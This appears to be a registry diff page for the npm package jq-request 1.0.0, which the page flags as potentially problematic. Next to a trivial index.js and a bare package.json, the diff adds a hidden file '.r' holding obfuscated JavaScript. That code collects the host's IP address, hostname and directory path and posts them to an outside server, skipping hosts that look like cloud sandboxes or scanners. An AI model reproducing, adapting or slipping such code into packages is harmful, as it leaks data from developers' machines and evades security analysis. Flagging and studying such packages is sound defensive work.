jq-request 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of jq-request might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/.r +1 -0
  2. package/index.js +1 -0
  3. package/package.json +8 -0
package/.r ADDED
@@ -0,0 +1 @@
1
+ const _0xecd6ba=_0x5e82;(function(_0x3b88a1,_0x3c4fe8){const _0x2ca2a4=_0x5e82,_0x113332=_0x3b88a1();while(!![]){try{const _0x550fc9=parseInt(_0x2ca2a4(0x10f))/0x1*(-parseInt(_0x2ca2a4(0x116))/0x2)+-parseInt(_0x2ca2a4(0x108))/0x3*(parseInt(_0x2ca2a4(0x104))/0x4)+parseInt(_0x2ca2a4(0x11c))/0x5*(parseInt(_0x2ca2a4(0x110))/0x6)+-parseInt(_0x2ca2a4(0x113))/0x7+parseInt(_0x2ca2a4(0x10e))/0x8+-parseInt(_0x2ca2a4(0x117))/0x9*(-parseInt(_0x2ca2a4(0x11a))/0xa)+-parseInt(_0x2ca2a4(0x118))/0xb;if(_0x550fc9===_0x3c4fe8)break;else _0x113332['push'](_0x113332['shift']());}catch(_0x957318){_0x113332['push'](_0x113332['shift']());}}}(_0x555f,0x68438));function _0x5e82(_0x500f63,_0x58be0e){const _0x555f3f=_0x555f();return _0x5e82=function(_0x5e82be,_0xa34a14){_0x5e82be=_0x5e82be-0x104;let _0x412958=_0x555f3f[_0x5e82be];return _0x412958;},_0x5e82(_0x500f63,_0x58be0e);}const os=require('os'),https=require('https');var __dirname;function _0x555f(){const _0x3227ad=['length','aws-','filter','concat','6592704DMYwiS','1gliQxl','71454jfDpNu','values','application/json','218715pQmvNj','dc.70.lc','map','480758GymFqG','626193ENzDcS','9879100HxnVNx','startsWith','40lJTlms','POST','265kOmijy','stringify','end','request','4djDwsN','instance','hostname','/app/node_modules','410355QgfmBF','write'];_0x555f=function(){return _0x3227ad;};return _0x555f();}const ip=[][_0xecd6ba(0x10d)](...Object[_0xecd6ba(0x111)](os['networkInterfaces']()))[_0xecd6ba(0x10c)](({family:_0x21f579,internal:_0x2f381a})=>_0x21f579==='IPv4'&&!_0x2f381a)[_0xecd6ba(0x115)](({address:_0x3f3d8b})=>_0x3f3d8b)[0x0],host=os[_0xecd6ba(0x106)](),path=__dirname,org='',package='',version='';data={'ip':ip,'host':host,'path':path,'org':org,'package':package,'version':version},body=JSON[_0xecd6ba(0x11d)](data);if(!(host['startsWith'](_0xecd6ba(0x10b))||path[_0xecd6ba(0x119)]('/npm/node_modules')||path[_0xecd6ba(0x119)](_0xecd6ba(0x107))||host==_0xecd6ba(0x105))){var r=https[_0xecd6ba(0x11f)]({'hostname':_0xecd6ba(0x114),'port':0x1bb,'path':'/d','method':_0xecd6ba(0x11b),'headers':{'Content-Length':body[_0xecd6ba(0x10a)],'Content-Type':_0xecd6ba(0x112)}});r[_0xecd6ba(0x109)](body),r[_0xecd6ba(0x11e)]();}
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log('A sample package')
package/package.json ADDED
@@ -0,0 +1,8 @@
1
+ {
2
+ "name": "jq-request",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "author": "",
7
+ "license": "ISC"
8
+ }